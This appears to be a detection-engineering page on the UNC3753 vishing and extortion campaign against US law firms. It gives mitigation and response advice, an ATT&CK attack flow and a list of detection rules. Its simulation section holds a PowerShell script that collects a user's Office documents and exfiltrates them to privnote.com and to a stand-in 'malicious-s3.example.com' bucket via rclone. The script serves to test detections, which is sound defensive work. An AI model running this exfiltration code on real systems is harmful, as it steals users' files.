Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A financially motivated threat cluster tracked as UNC3753 is running vishing campaigns that trick victims into installing remote monitoring and management software. Once access is established, the actors steal sensitive legal and financial information and then extort the victim organization by threatening public exposure. The campaign is focused on U.S. professional services firms, particularly law firms, and may involve both cyber-enabled and physical data theft.
Investigation
Mandiant observed the complete intrusion cycle, from the initial voice-phishing call to data theft and extortion, sometimes within a single business day. Victims were convinced to use screen-sharing tools and RMM software such as AnyDesk, Bomgar, or a custom SuperOps installer delivered with a curl command. Data exfiltration was carried out using tools such as WinSCP, Rclone, or direct uploads to consumer cloud storage accounts.
Mitigation
Organizations should train staff to recognize vishing attempts, enforce strict verification procedures for any remote support request, and block unauthorized RMM and screen-sharing tools. Disabling removable media, monitoring for unusual outbound transfers to cloud storage or FTP destinations, applying conditional access controls to VDI, and enforcing MFA on critical document repositories can further reduce risk.
Response
If this activity is detected, isolate the affected endpoint immediately, terminate any unauthorized remote sessions, and remove installed RMM binaries. Investigators should collect command-line history, registry changes, and scheduled task artifacts for forensic review. Compromised credentials should be reset, data exfiltration should be assessed, and law enforcement engagement should be considered if extortion has begun.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Node definitions initial_access["<b>Action</b> – <b>T1566.004 Phishing: Spearphishing Voice</b><br/><b>Description</b>: Attacker uses a convincing voice call to trick the target into providing credentials or executing malicious commands."] class initial_access action user_execution["<b>Action</b> – <b>T1204.002 Malicious File</b><br/><b>Tool</b>: cURL + MSI installer<br/><b>Description</b>: Victim runs a malicious MSI file downloaded via cURL, resulting in code execution on the system."] class user_execution action remote_desktop["<b>Action</b> – <b>T1219.002 Remote Desktop Software</b><br/><b>Tools</b>: Zoom, Microsoft Teams, AnyDesk<br/><b>Description</b>: Legitimate remoteu2011desktop or meeting applications are abused to maintain persistent remote access."] class remote_desktop action discovery["<b>Action</b> – <b>T1083 File and Directory Discovery</b> & <b>T1680 Local Storage Discovery</b><br/><b>Description</b>: Adversary enumerates files, directories and local storage locations to locate valuable data for exfiltration."] class discovery action data_staging["<b>Action</b> – <b>T1074 Data Staged</b> & <b>T1560 Archive Collected Data</b><br/><b>Description</b>: Collected files are staged locally and compressed into archives to prepare for exfiltration."] class data_staging action exfiltration["<b>Action</b> – <b>T1567.002 Exfiltration to Cloud Storage</b> & <b>T1020 Automated Exfiltration</b><br/><b>Target</b>: Google Drive<br/><b>Description</b>: Automated upload of staged archives to a cloud storage service for remote extraction."] class exfiltration action physical_media["<b>Action</b> – <b>T1052 Exfiltration Over Physical Medium</b><br/><b>Description</b>: Transfer of data onto removable media for offline exfiltration when network channels are restricted."] class physical_media action cleanup["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b><br/><b>Description</b>: Deletion of Windows event logs to erase evidence of the intrusion."] class cleanup action %% Edge connections initial_access –>|leads_to| user_execution user_execution –>|enables| remote_desktop remote_desktop –>|enables| discovery discovery –>|leads_to| data_staging data_staging –>|enables| exfiltration exfiltration –>|leads_to| physical_media physical_media –>|followed_by| cleanup "
Attack Flow
Detections
Alternative Remote Access / Management Software (via process_creation)
View
Suspicious CURL Usage (via cmdline)
View
Possible SuperOps RMM Software Installation Attempt (via file_event)
View
Alternative Remote Access / Management Software (via system)
View
Alternative Remote Access / Management Software (via audit)
View
Possible RMM Software Installation Attempt Using MsiInstaller (via application logs)
View
IOCs (SourceIP) to detect: Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms
View
IOCs (DestinationIP) to detect: Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms
View
Detection of Unauthorized File-Sharing and High-Volume SSH Traffic [Firewall]
View
UNC3753 Data Exfiltration Using Privnote and File Transfer Tools [Windows Network Connection]
View
UNC3753 Remote Access and Malicious MSI Installation [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
-
Recon & Data Staging (T1005, T1083):
The adversary enumerates user directories and copies all*.docxand*.xlsxfiles to a staging folderC:TempStagedData. -
Upload via Privnote (T1567.002):
Using PowerShell, the attacker reads each file, base‑64‑encodes the content, and posts it tohttps://privnote.com/api/note. The command line includes the URL, which satisfies theselection_privnotecondition. -
Transfer with Rclone (T1020):
The attacker runsrclone.exe(downloaded on‑the‑fly) to push the staged files to a malicious S3 bucket. The process name “rclone.exe” matchesselection_tool. -
Cleanup: Delete the staging folder and any residual binaries.
-
-
Regression Test Script: (PowerShell – self‑contained, no external dependencies beyond
Invoke-WebRequest.)# ------------------------------------------------- # UNC3753 Exfiltration Simulation – PowerShell # ------------------------------------------------- # 1. Prepare staging directory $staging = "$env:USERPROFILETempStagedData" New-Item -ItemType Directory -Force -Path $staging | Out-Null # 2. Copy sample data (simulate data collection) Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force } # 3. Upload each file to Privnote (web‑service exfiltration) $privnoteUrl = "https://privnote.com/api/note" Get-ChildItem -Path $staging -File | ForEach-Object { $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName)) $body = @{ text = $content } # The URL appears in the command line -> triggers selection_privnote Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null } # 4. Download Rclone (if not present) and exfiltrate via S3 $rcloneExe = "$env:TEMPrclone.exe" if (-not (Test-Path $rcloneExe)) { Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip" Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force } # Configure a remote (malicious) S3 bucket – the config is written to a temporary file $rcloneConfig = @" [malicious type = s3 provider = AWS access_key_id = AKIAFAKEKEY secret_access_key = fakeSecretKey123 region = us-east-1 endpoint = https://malicious-s3.example.com "@ $configPath = "$env:TEMPrclone.conf" $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII # Execute rclone copy – process name "rclone.exe" triggers selection_tool & $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO # 5. Cleanup Remove-Item -Recurse -Force $staging Remove-Item -Force $rcloneExe, $configPath -
Cleanup Commands:
# Terminate any lingering WinSCP or Rclone processes Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force # Delete temporary files left behind (if any) Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue